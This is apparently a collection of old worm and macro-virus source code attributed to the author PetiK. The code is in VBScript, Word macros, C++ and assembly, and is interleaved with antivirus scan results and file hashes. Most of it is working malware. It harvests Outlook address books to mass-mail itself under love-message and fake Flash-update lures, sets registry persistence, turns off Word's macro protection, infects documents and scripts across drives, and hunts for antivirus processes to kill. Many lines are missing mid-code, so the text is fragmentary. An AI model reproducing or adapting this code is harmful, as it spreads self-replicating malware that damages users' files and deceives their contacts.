if(myproc!=NULL) {
}
}
}
}
File WarGames.exe received on 05.16.2009 19:57:59 (CET)

a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Wargam!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/Warga.worm.77824
AntiVir 7.9.0.168 2009.05.15 Worm/WarGame.1
Authentium 5.1.2.4 2009.05.16 W32/Malware!6ca1
Avast 4.8.1335.0 2009.05.15 Win32:Wargam-B
AVG 8.5.0.336 2009.05.15 I-Worm/Wargames
BitDefender 7.2 2009.05.16 Win32.WarGames.A@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Wargam
ClamAV 0.94.1 2009.05.16 Worm.Wargam
Comodo 1157 2009.05.08 Worm.Win32.Warga.A
DrWeb 5.0.0.12182 2009.05.16 Win32.HLLM.Warga
eSafe 7.0.17.0 2009.05.14 Win32.Wargam
eTrust-Vet 31.6.6508 2009.05.16 Win32/Wargam
F-Prot 4.4.4.56 2009.05.16 W32/Malware!6ca1
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Wargam
Fortinet 3.117.0.0 2009.05.16 W32/Wargam.A@mm
GData 19 2009.05.16 Win32.WarGames.A@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Wargam
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Wargam
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Wargam
McAfee 5616 2009.05.15 W32/Warga@MM
McAfee+Artemis 5616 2009.05.15 W32/Warga@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.WarGame.1
Microsoft 1.4602 2009.05.16 Worm:Win32/Wargam.A@mm
NOD32 4080 2009.05.15 Win32/Warga.A
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Worgam.77824
Panda 10.0.0.14 2009.05.16 W32/Wargam
PCTools 4.4.2.0 2009.05.16 I-Worm.Petwrg.A
Rising 21.29.52.00 2009.05.16 Worm.Wargames
Sophos 4.41.0 2009.05.16 W32/Warga-A
Sunbelt 3.2.1858.2 2009.05.16 W32.Wargam.Worm
Symantec 1.4.4.12 2009.05.16 W32.Wargam.Worm
TheHacker 6.3.4.1.326 2009.05.15 W32/Wargam
TrendMicro 8.950.0.1092 2009.05.15 WORM_WARGA.A
VBA32 3.12.10.5 2009.05.16 Win32.HLLW.Wargames
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.Wargame
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Petwrg.A
MD5...: f3f60781ccd4c9c429a1431f0162a295
SHA1..: d6ff0b428178a9898f1552a0d18e59b48686cb67
<html><head><title>Love Linda</title>
<body bgColor=blue onLoad="window.status='I LOVE YOU Linda'">
<font face='verdana' color=yellow size='3'>For Linda...<br>
<br>Because I Love You.
<br>I code this.<br>I can't say what I feel for you.
<br>You will know by this way.<br></font>
msgbox "Please accept the ActiveX",vbinformation,"Info"
ws.Run javascript:location.reload()
Else
Set linda = fso.CreateTextFile(win&"\LoveLinda.htm", 2)
Set love = document.body.createTextRange
linda.WriteLine "<html><head><title>Love Linda</title>"
linda.WriteLine "<body bgColor=blue>"
linda.WriteLine love.htmltext
linda.WriteLine "</body></html>"
linda.Close
pers=ws.RegRead
Folders\Personal")
create(win)
create(sys)
create(pers)
cv="HKLM\Software\Microsoft\Windows\CurrentVersion"
ws.RegWrite cv&"\RegisteredOwner","Linda"
ws.RegWrite cv&"\RegisteredOrganization","Love Linda"
ws.RegWrite cv&"\Run\LoveLinda",sys&"\lindamail.vbs"
Set mail=fso.CreateTextFile(sys&"\lindamail.vbs", 2)
mail.WriteLine "On Error Resume Next"
mail.WriteLine "Set out=CreateObject(""Outlook.Application"")"
mail.WriteLine "Set B=out.GetNameSpace(""MAPI"")"
mail.WriteLine "For Each C In B.AddressLists"
mail.WriteLine "If C.AddressEntries.Count <> 0 Then"
mail.WriteLine "For D=1 To C.AddressEntries.count"
mail.WriteLine "Set em=C.AddressEntries(D)"
mail.WriteLine "Set lm=out.CreateItem(0)"
mail.WriteLine "lm.To=em.Address"
mail.WriteLine "lm.Subject=""Love Message..."""
mail.WriteLine "lm.Body=""Read this beautiful love message."""
mail.WriteLine "lm.Attachments.Add(""" &win& "\LoveLinda.htm"")"
mail.WriteLine "lm.DeleteAfterSubmit=True"
mail.WriteLine "If lm.To <> """" Then"
mail.WriteLine "F.Send"
mail.WriteLine "End If"
mail.WriteLine "Next"
mail.WriteLine "End If"
mail.WriteLine "Next"
End If
Function create(doss)
Set FolderObj = fso.GetFolder(doss)
For each file in FO
ext = lcase(fso.GetExtensionName(file.Name))
if ext="ini" or ext="txt" or ext="bmp" or ext="doc" or ext="xls" or ext="mp3"
or ext="hlp" or ext="inf" Then
Set linda = fso.CreateTextFile(file.path&".htm", 2)
Set love = document.body.createTextRange
linda.WriteLine "<html><head><title>Love Linda</title>"
linda.WriteLine "<body bgColor=blue>"
linda.WriteLine love.htmltext
linda.WriteLine "</body></html>"
linda.Close
end if
next
End Function
</script></body></html>
File Linda.htm received on 05.16.2009 17:51:29 (CET)
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Bubbleboy!IK
Authentium 5.1.2.4 2009.05.16 JS/Mailer.A
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.CC1D1675
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.16 -
DrWeb 5.0.0.12182 2009.05.16 WORM.Virus
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 VBS/Nilda
F-Prot 4.4.4.56 2009.05.16 JS/Mailer.A
Fortinet 3.117.0.0 2009.05.16 JS/Mailer.A
GData 19 2009.05.16 Generic.ScriptWorm.CC1D1675
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Bubbleboy
K7AntiVirus 7.10.737 2009.05.16 -
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik
Norman 6.01.05 2009.05.16 HTML/Worm.gen
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.K
PCTools 4.4.2.0 2009.05.16 VBS.Lovlind.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 -
Sophos 4.41.0 2009.05.16 VBS/Petik-N
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 -
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 HTML_LINDA.A
VirusBuster 4.6.5.0 2009.05.16 VBS.Lovlind.A
MD5...: 43ac95142a5c7281246b68ef0584e079
SHA1..: 66758177710fcdd652c37671efe593f7651248e2
' Name : W97M.Wolf
' Author : PetiK
' Date : 25/02/2002
Attribute VB_Name = "Wolf"

Sub AutoOpen()
Call EndProtect
Call Infection
Call SearchF
If Day(Now) = 15 Then Call Payload
End Sub
Sub HelpAbout()
.Visible = True
End With
MsgBox "Very Thanx to Tex Avery. hahahahaha", vbInformation, "W97M.Wolf.A"
Application.UserName = "My Name is Wolf"
End Sub
Sub AutoClose()
With Dialogs(wdDialogFileSummaryInfo)
.Author = "Wolf"
.Title = "My Friend the Wolf"
.Subject = "Tex Avery and the other"
.Keywords = "Wolf, Tex Avery, Ed Love, Droopy"
.Comments = "No comments"
.Execute
End With
If Left(ActiveDocument.Name, 8) <> "Document" And ActiveDocument.Saved = False Then
ActiveDocument.Save
End If
End Sub
Sub Infection()
Set Nor = NormalTemplate.VBProject.VBComponents
Set Doc = ActiveDocument.VBProject.VBComponents
DropFile = "C:\Wolf.sys"
If Nor.Item("Wolf").Name <> "Wolf" Then
Doc("Wolf").Export DropFile
Nor.Import DropFile
End If
If Doc.Item("Wolf").Name <> "Wolf" Then
Nor("Wolf").Export DropFile
Doc.Import DropFile
ActiveDocument.Save
End If
End Sub
Sub SearchF()
With Application.FileSearch
.FileName = "*.doc"
.LookIn = "C:\"
.SearchSubFolders = False
.FileType = msoFileTypeWordDocuments
.Execute
For I = 1 To .FoundFiles.Count
FileSystem.SetAttr .FoundFiles(I), vbNormal
Next I
End With
End Sub
Sub EndProtect()
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
Select Case Application.Version
Case "10.0"
"HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
Case "9.0"
End Select
WordBasic.DisableAutoMacros 0
End Sub
Sub Payload()
MyApp = Shell("notepad.exe", 1)
SendKeys "This is my last Word97Macro virus.", True
AppActivate (MyApp)
End Sub
File Wolf.doc received on 05.11.2009 21:18:10 (CET)

a-squared 4.0.0.101 2009.05.11 Virus.MSWord.Droopy.A!IK
AhnLab-V3 5.0.0.2 2009.05.11 W97M/Droopy.B
AntiVir 7.9.0.166 2009.05.11 W2000M/Droopy.A
Antiy-AVL 2.0.3.1 2009.05.11 -
Authentium 5.1.2.4 2009.05.11 W97M/Droopy.A
Avast 4.8.1335.0 2009.05.10 MW97:Droopy family
AVG 8.5.0.327 2009.05.11 W97M/Beko
BitDefender 7.2 2009.05.11 W97M.Droopy.A
CAT-QuickHeal 10.00 2009.05.09 a variant of virus W97M.Inadd
ClamAV 0.94.1 2009.05.11 WM.Pivis
Comodo 1157 2009.05.08 Virus.MSWord.Droopy
DrWeb 5.0.0.12182 2009.05.11 W97M.Droopy
eSafe 7.0.17.0 2009.05.10 W97M.Wolf.A
eTrust-Vet 31.6.6500 2009.05.11 W97M/Droopy.A
F-Prot 4.4.4.56 2009.05.11 W97M/Droopy.A
F-Secure 8.0.14470.0 2009.05.11 Virus.MSWord.Droopy
Fortinet 3.117.0.0 2009.05.11 W97M/Droopy.A
GData 19 2009.05.11 W97M.Droopy.A
Ikarus T3.1.1.49.0 2009.05.11 Virus.MSWord.Droopy.A
K7AntiVirus 7.10.732 2009.05.11 Macro.Droopy
Kaspersky 7.0.0.125 2009.05.11 Virus.MSWord.Droopy
McAfee-GW-Edition 6.7.6 2009.05.11 Macro.Droopy.A
Microsoft 1.4602 2009.05.11 Virus:W97M/Droopy.A
NOD32 4065 2009.05.11 W97M/Droopy.A
Norman 6.01.05 2009.05.11 W97M/Droopy.A
nProtect 2009.1.8.0 2009.05.11 W97M.Droopy.A
Panda 10.0.0.14 2009.05.11 W97M/CokeBoy
PCTools 4.4.2.0 2009.05.07 WORD.97.Flow.A
Prevx 3.0 2009.05.11 -
Rising 21.29.04.00 2009.05.11 Macro.Word97.Wolf.a
Sophos 4.41.0 2009.05.11 WM97/Droopy-A
Sunbelt 3.2.1858.2 2009.05.09 W97M.Droopy (v)
Symantec 1.4.4.12 2009.05.11 W97M.Droopy.A
TrendMicro 8.950.0.1092 2009.05.11 W97M_Generic
VBA32 3.12.10.4 2009.05.11 Virus.MSWord.Droopy
ViRobot 2009.5.11.1729 2009.05.11 W97M.Droopy.A
VirusBuster 4.6.5.0 2009.05.11 WORD.97.Flow.A
MD5...: 456d71a02c519c6a1f13fa9ffc899f2e
SHA1..: 534f5ae68f8634c6c69a5b40ad131a4bf674d000
' Name : VBS/W97M.Doublet
' Author : PetiK
' Language : VBS
' Date : 02/03/2002

Set fl=sf.OpenTextFile(WScript.ScriptFullName,1)
virus=fl.ReadAll
fl.Close
personal=ws.SpecialFolders("MyDocuments")
sf.GetFile(WScript.ScriptFullName).Copy(sf.GetSpecialFolder(0)&"\Doublet.vbs")
Set vw=sf.CreateTextFile("C:\Doublet.sys")
vw.WriteLine "Attribute VB_Name = ""Doublet"""
vw.WriteLine "Sub AutoOpen()"
vw.WriteLine "On Error Resume Next"
vw.WriteLine "Call FuckProtect"
vw.WriteLine "Call Infect"
vw.WriteLine "End Sub"
vw.WriteLine ""
vw.WriteLine "Sub HelpAbout()"
vw.WriteLine "If Day(Now) = 10 Then"
vw.WriteLine "MsgBox ""W97M/VBS.Doublet. Hahahahaha"", vbInformation, ""For "" +
Application.UserName"
vw.WriteLine "End If"
vw.WriteLine ""
vw.WriteLine "Sub Infect()"
vw.WriteLine "On Error Resume Next"
vw.WriteLine "Set Nor = NormalTemplate.VBProject.VBComponents"
vw.WriteLine "Set Doc = ActiveDocument.VBProject.VBComponents"
vw.WriteLine "Drop = ""C:\Doublet.sys"""
vw.WriteLine "If Nor.Item(""Doublet"").Name <> ""Doublet"" Then"
vw.WriteLine " Doc(""Doublet"").Export Drop"
vw.WriteLine " Nor.Import Drop"
vw.WriteLine "If Doc.Item(""Doublet"").Name <> ""Doublet"" Then"
vw.WriteLine " Nor(""Doublet"").Export Drop"
vw.WriteLine " Doc.Import Drop"
vw.WriteLine " ActiveDocument.Save"
vw.WriteLine ""
vw.WriteLine "Sub FuckProtect()"
vw.WriteLine "With Options"
vw.WriteLine " .ConfirmConversions = False"
vw.WriteLine " .VirusProtection = False"
vw.WriteLine " .SaveNormalPrompt = False"
vw.WriteLine "End With"
vw.WriteLine "Select Case Application.Version"
vw.WriteLine "Case ""10.0"""
vw.WriteLine " System.PrivateProfileString("""",
""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""Level"") = 1&"
""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""AccessVBOM"") = 1&"
vw.WriteLine "Case ""9.0"""
""HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"", ""Level"") = 1&"
vw.WriteLine "End Select"
vw.WriteLine "WordBasic.DisableAutoMacros 0"
vw.Close
lecteur()
ws.RegWrite "HKCU\Software\Microsoft\Office\10.0\Word\Security\AccessVBOM", 1,
"REG_DWORD"
ws.RegWrite "HKCU\Software\Microsoft\Office\10.0\Word\Security\Level", 1, "REG_DWORD"
ws.RegWrite "HKCU\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD"
Set out=CreateObject("Outlook.Application")
Set MA=out.GetNameSpace("MAPI")
For Each C In MA.AddressLists
tmpname=""
randomize(timer)
namel=int(rnd(1)*20)+1
For lettre = 1 To namel
randomize(timer)
tmpname=tmpname & chr(int(rnd(1)*26)+97)
Next
typext = "execombatbmpjpggifdocxlsppthtmhtthta"
randomize(timer)
tmpext = int(rnd(1)*11)+1
tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs"
sf.GetFile(WScript.ScriptFullName).Copy(sf.GetSpecialFolder(0)&"\"&tmpname)
subject="Re: " & left(tmpname,len(tmpname)-4) & " for you."
Set AD=C.AddressEntries(D)
Set mail=out.CreateItem(0)
mail.To=AD.Address
mail.Subject=subject
body="Hi " & AD.Name & ","
body = body & VbCrLf & "Look at this attached found on the net."
body = body & VbCrLf & " See you soon"
mail.Body=body
mail.Attachments.Add(sf.GetSpecialFolder(0)&"\"&tmpname)
mail.DeleteAfterSubmit=True
If mail.To <> "" Then
mail.Send
sf.DeleteFile sf.GetSpecialFolder(0)&"\"&tmpname
End If
Next
End If
Next
Set wrd=WScript.CreateObject("Word.Application")
If wrd Is Nothing Then WScript.Quit
wrd.Visible=False
Set srch = wrd.Application.FileSearch
srch.Lookin = ""&personal&"": srch.SearchSubFolders = True: srch.FileName="*.doc":
srch.Execute
For f = 1 To srch.FoundFiles.Count
victim = srch.FoundFiles(f)
wrd.Documents.Open victim
Set Doc=wrd.ActiveDocument.VBProject.VBComponents
If Doc.Item("Doublet").Name <> "Doublet" Then
Doc.Import ("C:\Doublet.sys")
wrd.ActiveDocument.Save
End If
wrd.ActiveDocument.Close
Next
wrd.Application.Quit
Sub lecteur()
dim f,f1,fc
Set dr = sf.Drives
For Each d in dr
liste(d.path&"\")
End If
Next
End Sub
Sub infecte(dossier)
Set f = sf.GetFolder(dossier)
Set fc = f.Files
For Each f1 in fc
ext = sf.GetExtensionName(f1.path)
ext = lcase(ext)
if (ext="vbs") or (ext="vbe") Then
Set cot=sf.OpenTextFile(f1.path, 1, False)
If cot.ReadLine <> "'VBS/W97M.Doublet" then
cot.Close
Set cot=sf.OpenTextFile(f1.path, 1, False)
vbsorg=cot.ReadAll()
cot.Close
Set inf=sf.OpenTextFile(f1.path,2,True)
inf.WriteLine "'VBS/W97M.Doublet"
inf.Write(vbsorg)
inf.WriteLine ""
inf.WriteLine virus
inf.Close
End If
End If
Next
End Sub
Sub liste(dossier)
Set f = sf.GetFolder(dossier)
Set sf = f.SubFolders
For Each f1 in sf
infecte(f1.path)
liste(f1.path)
Next
End Sub
File Doublet.vbs received on 05.16.2009 11:30:45 (CET)

a-squared 4.0.0.101 2009.05.16 Email-Worm.VBS.Doublet!IK
AhnLab-V3 5.0.0.2 2009.05.15 VBS/Doublet
AntiVir 7.9.0.168 2009.05.15 Worm/Yumaho
Authentium 5.1.2.4 2009.05.15 VBS/Doublet.A@mm
Avast 4.8.1335.0 2009.05.15 VBS:Doublet
AVG 8.5.0.336 2009.05.15 VBS/Telbound.A
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.897E1D20
CAT-QuickHeal 10.00 2009.05.15 VBS/Doublet.A
ClamAV 0.94.1 2009.05.15 Worm.VBS.Yumao
Comodo 1157 2009.05.08 Worm.VBS.Agent.~H
DrWeb 5.0.0.12182 2009.05.16 VBS.Doublet
eSafe 7.0.17.0 2009.05.14 VBS.LoveLet3.
eTrust-Vet 31.6.6508 2009.05.16 VBS/Yuma
F-Prot 4.4.4.56 2009.05.15 VBS/Doublet.A@mm
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.VBS.Doublet
Fortinet 3.117.0.0 2009.05.16 VBS/Doublet.A@mm
GData 19 2009.05.16 Generic.ScriptWorm.897E1D20
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.VBS.Doublet
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.VBS.Doublet
McAfee 5616 2009.05.15 VBS/Dossier@MM
McAfee+Artemis 5616 2009.05.15 VBS/Dossier@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Yumaho
Microsoft 1.4602 2009.05.16 Virus:VBS/Doublet.A
NOD32 4080 2009.05.15 VBS/Doublet.A
Norman 6.01.05 2009.05.16 VBS/Doublet.H
nProtect 2009.1.8.0 2009.05.16 VBS.Doublet.A@mm
Panda 10.0.0.14 2009.05.15 VBS/Doublet.A.worm
PCTools 4.4.2.0 2009.05.15 VBS.Doubt.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Script.VBS.I-Worm.Doublet
Sophos 4.41.0 2009.05.16 VBS/Telboud-A
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 Macro.src
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_Doublet.A
VBA32 3.12.10.5 2009.05.16 Email-Worm.VBS.Doublet
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 VBS.Doubt.A
MD5...: bdd4e8ab9db0d5e79474cb50f1f0ebda
SHA1..: 303d4183f401e9bf707dab9d05d993e329f71753
/*
Name : I-Worm.LiTeLo
Author : PetiK
Date : March 7th 2002 - March 10th 2002
Language : C++/HTML
*/
#include <stdio.h>
#include <mapi.h>
#pragma argused
char filename[50],copysys[50],copyreg[50],htmf[50],fakemess[1024];
Uninst="Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\LiteLo";
char dn[20]="Flash32 Uninstall",ust[40];
BYTE htmail[10];
DWORD Tmp,type=REG_SZ,shtmail=sizeof(htmail);
LPTSTR cmdLine,ptr;
BOOL installed,uninstall;
HMODULE kernel32;
FILE *htm;
LHANDLE session;
MapiMessage *mess;
HINSTANCE WiNet,hMAPI;
char htmms[]="<html><head><title>Flash Information</title></head>\n"

"<body><script language=vbscript>\n"
"On Error Resume Next\n"
"msgbox \"Please accept ActiveX by clicking YES\",vbinformation,\"Flash32
NET\"\n"
"Set abcgqlbg=CreateObject(\"Scripting.FileSystemObject\")\n"
"Set gqlbgrlb=CreateObject(\"WScript.Shell\")\n\n"
"If err.number=429 Then\n"
"gqlbgrlb.Run javascript:location.reload()\n\n"
"Else\n\n"
"mess=\"Contact :\"\n"
"Set bgqlbgqm=CreateObject(\"Outlook.Application\")\n"
"Set mbgqlbgq=bgqlbgqm.GetNameSpace(\"MAPI\")\n"
"For Each C In mbgqlbgq.AddressLists\n"
"If C.AddressEntries.Count <> 0 Then\n"
"For D=1 To C.AddressEntries.Count\n"
"Set qlbgqlbg=C.AddressEntries(D)\n"
"Set gqlcgqlb=bgqlbgqm.CreateItem(0)\n"
"mess=mess &vbCrLf& qlbgqlbg.Address\n"
"gqlcgqlb.To=qlbgqlbg.Address\n"
"gqlcgqlb.Subject=\"New Version of Flash.\"\n"
"gqlcgqlb.Body=\"Unlimited demo verion of Flash.\"\n"
"gqlcgqlb.Attachments.Add(abcgqlbg.GetSpecialFolder(1)&\"\\Flash32.exe\")\n"
"gqlcgqlb.DeleteAfterSubmit=True\n"
"If gqlcgqlb.To <> \"\" Then\n"
"gqlcgqlb.Send\n"
"End If\n"
"Next\n"
"End If\n"
"Next\n\n"
"MsgBox mess,vbinformation,\"Flash Contact\"\n"
"gqlbgrlb.RegWrite \"HKLM\\Software\\Microsoft\\HTMail\",\"OK\"\n"
"gqlbgrlb.Run javascript:location.href=(\"http://www.flash.com\")\n"
"End If\n"
"</script></body></html>";
char *attname[]={"flash32.exe","flsh32eng.exe","flsh32fr.exe","new_flash.exe",
"freeflash32.exe","installflash.exe","setupflash.exe"};
HKEY hReg;
SYSTEMTIME systime;
BOOL (PASCAL FAR *INetConnect)(LPDWORD flags,DWORD reserved);

{
kernel32=GetModuleHandle("KERNEL32.DLL");
if(kernel32) {
(FARPROC &)RegSerPro=GetProcAddress(kernel32,"RegisterServiceProcess");
if(RegSerPro)
RegSerPro(NULL,1);
}
GetSystemDirectory((char *)copysys,100);
strcpy(htmf,copysys);
strcat(copysys,"\\Flash32.exe");
strcat(htmf,"\\FlashNet.htm");
installed=FALSE;
uninstall=FALSE;
cmdLine=GetCommandLine();
if(cmdLine) {
for(ptr=cmdLine;ptr[0]!='-' && ptr[1]!=0;ptr++);
if(ptr[0]=='-' && ptr[1]!=0) {
switch(ptr[1]) {
default:
break;
case 'i':
installed=TRUE;
break;
case 'u':
installed=TRUE;
uninstall=TRUE;
break;
}
}
}
if(!installed) {
CopyFile(filename,copysys,FALSE);
strcpy(copyreg,copysys);
strcat(copyreg," -i");
RegSetValueEx(hReg,"Flash32",0,REG_SZ,(BYTE *)copyreg,100);
RegCloseKey(hReg);
strcpy(ust,copysys);
strcat(ust," -u");
RegCreateKey(HKEY_LOCAL_MACHINE,Uninst,&hReg);
RegSetValueEx(hReg,"DisplayName",0,REG_SZ,(BYTE *)dn,20);
RegSetValueEx(hReg,"UninstallString",0,REG_SZ,(BYTE *)ust,40);
RegCloseKey(hReg);
htm=fopen(htmf,"w");
fprintf(htm,"%s",htmms);
fclose(htm);
MessageBox(NULL,"Error : cannot open flash32.dll","ERROR",MB_OK|MB_ICONSTOP);

ExitProcess(0);
}
if(uninstall) {
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_ALL_ACCESS,&hReg);
RegDeleteValue(hReg,"Flash32");
RegCloseKey(hReg);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall"
,0,KEY_ALL_ACCESS,&hReg);
RegDeleteKey(hReg,"LiteLo");
RegCloseKey(hReg);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft",0,KEY_ALL_ACCESS,&hReg);
RegDeleteValue(hReg,"HTMail");
RegCloseKey(hReg);
DeleteFile(htmf);
WritePrivateProfileString("rename","NUL",copysys,"WININIT.INI");
MessageBox(NULL,"Please restart the system.","Uninstall Flash32",MB_OK|
MB_ICONHAND);
ExitWindowsEx(EWX_REBOOT|EWX_FORCE,0);
ExitProcess(0);
}
// Check if we are connected

WiNet=LoadLibrary("WININET.DLL");
if(!WiNet) {
goto cworm;
}
(FARPROC &)INetConnect=GetProcAddress(WiNet, "InternetGetConnectedState");
if(!INetConnect) {
FreeLibrary(WiNet);
goto cworm;
}
while(INetConnect(&Tmp,0)!=TRUE) {
Sleep(1000);
}
FreeLibrary(WiNet);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft",0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"HTMail",0,&type,htmail,&shtmail);
RegCloseKey(hReg);
if(strcmp(htmail,"OK")!=0) {
ShellExecute(NULL,"open",htmf,NULL,NULL,SW_SHOWMAXIMIZED);
}
cworm:
do {
strcpy(mname,mess->lpOriginator->lpszName);
strcpy(maddr,mess->lpOriginator->lpszAddress);
mess->ulReserved=0;
mess->lpszSubject="New! New! Version of Flash";
mess->lpszNoteText="Hi,\nLook at this demo version of Flash.\n\nIt's easy and
free.";
mess->lpszMessageType=NULL;
mess->lpszDateReceived=NULL;
mess->lpszConversationID=NULL;
mess->flFlags=MAPI_SENT;
mess->lpOriginator->ulReserved=0;
mess->lpOriginator->ulRecipClass=MAPI_ORIG;
mess->lpOriginator->lpszName=mess->lpRecips->lpszName;
mess->lpOriginator->lpszAddress=mess->lpRecips->lpszAddress;
mess->nRecipCount=1;
mess->lpRecips->ulReserved=0;
mess->lpRecips->ulRecipClass=MAPI_TO;
mess->lpRecips->lpszName=mname;
mess->lpRecips->lpszAddress=maddr;
mess->nFileCount=1;
mess->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
memset(mess->lpFiles, 0, sizeof(MapiFileDesc));
mess->lpFiles->ulReserved=0;
mess->lpFiles->flFlags=NULL;
mess->lpFiles->nPosition=-1;
mess->lpFiles->lpszPathName=filename;
mess->lpFiles->lpszFileName=attname[GetTickCount()&6];
mess->lpFiles->lpFileType=NULL;
mSendMail(session, NULL, mess, NULL, NULL);
}
free(mess->lpFiles);
mFreeBuffer(mess);
FreeLibrary(hMAPI);
}
}
File Litelo.exe received on 05.16.2009 17:51:36 (CET)

a-squared 4.0.0.101 2009.05.16 Backdoor.Win32.Hackarmy!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/Litelo.worm.28672
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.Flash.1
Authentium 5.1.2.4 2009.05.16 W32/Petik.G
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Win32.Petik.F@mm
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 Worm.Win32.Petik
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.59904
eSafe 7.0.17.0 2009.05.14 Win32.Petik
F-Prot 4.4.4.56 2009.05.16 W32/Petik.G
GData 19 2009.05.16 Win32.Petik.F@mm
Ikarus T3.1.1.49.0 2009.05.16 Backdoor.Win32.Hackarmy
McAfee 5616 2009.05.15 W32/PetTick.ab.gen
McAfee+Artemis 5616 2009.05.15 W32/PetTick.ab.gen
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.Flash.1
NOD32 4080 2009.05.15 Win32/Petik
Panda 10.0.0.14 2009.05.16 Worm Generic.LC
PCTools 4.4.2.0 2009.05.16 I-Worm.Petllo
Rising 21.29.52.00 2009.05.16 Worm.Litelo
Sophos 4.41.0 2009.05.16 W32/Petik-Q
TheHacker 6.3.4.1.326 2009.05.15 Trojan/Hami
TrendMicro 8.950.0.1092 2009.05.15 WORM_PETIK.A
VBA32 3.12.10.5 2009.05.16 Win32.HLLW.Litelo
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Petllo
MD5...: 4292a1ade77cb9e51e3de52101c99dcb
SHA1..: b485fdd64fda5d12221f83be8c062588f051b2c6
comment #
Name : I-Worm.Together
Author : PetiK
Date : March 10th 2002 - March 15th 2002
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
PROCESSENTRY32 STRUCT
dwSize DWORD ?
cntUsage DWORD ?
th32ProcessID DWORD ?
th32DefaultHeapID DWORD ?
th32ModuleID DWORD ?
cntThreads DWORD ?
th32ParentProcessID DWORD ?
pcPriClassBase DWORD ?
dwFlags DWORD ?
szExeFile db 260 dup(?)
PROCESSENTRY32 ENDS
include Useful.inc
start_worm: call hide_worm
twin_worm:
push 50
push esi
push 0
push 50
@pushsz "\EBASE64.EXE"
api lstrcat

push edi
push 50
push edi
add edi,eax
mov eax,"aBe\"
stosd
mov eax,"46es"
stosd
mov eax,"exe."
stosd
pop edi ; edi = %system%\eBase64.exe

api lstrcmp
test eax,eax
jz continue_worm
push 0
push edi
push esi
api CopyFileA ; copy file
push 20
push edi
push 1
@pushsz "Encode Base64"
push 80000002h
jmp end_worm
continue_worm:
fuck_antivirus:
@pushsz "OIFIL400.DLL"
api LoadLibraryA
test eax,eax
jz end_fuck_antivirus
push 0
push 2
api CreateToolhelp32Snapshot
mov lSnapshot, eax
inc eax
jz end_fuck_antivirus
lea eax,uProcess
mov [eax.dwSize], SIZE PROCESSENTRY32
lea eax,uProcess
push eax
push lSnapshot
api Process32First
checkfile:
test eax, eax
jz InfExpRetCl
push ecx
mov eax,ProcessID
push offset uProcess
cmp eax,[uProcess.th32ProcessID]
je NextFile
lea ebx,[uProcess.szExeFile]
verif macro verifname,empty

local name
ifnb <empty>
%out too much arguments in macro 'nxt_instr'
.err
endif
call name
db verifname,0
name:
push ebx
api lstrstr
test eax,eax
endm
verif "ARG" ; Norton

jnz term
verif "AVP32.EXE" ; AVP
jnz term
verif "AVPCC.EXE" ; AVP
jnz term
verif "AVPM.EXE" ; AVP
jnz term
verif "WFINDV32.EXE"
jnz term
verif "F-AGNT95.EXE" ; F-SECURE
jnz term
verif "NAVAPW32.EXE" ; Norton
jnz term
verif "NAVW32.EXE" ; Norton
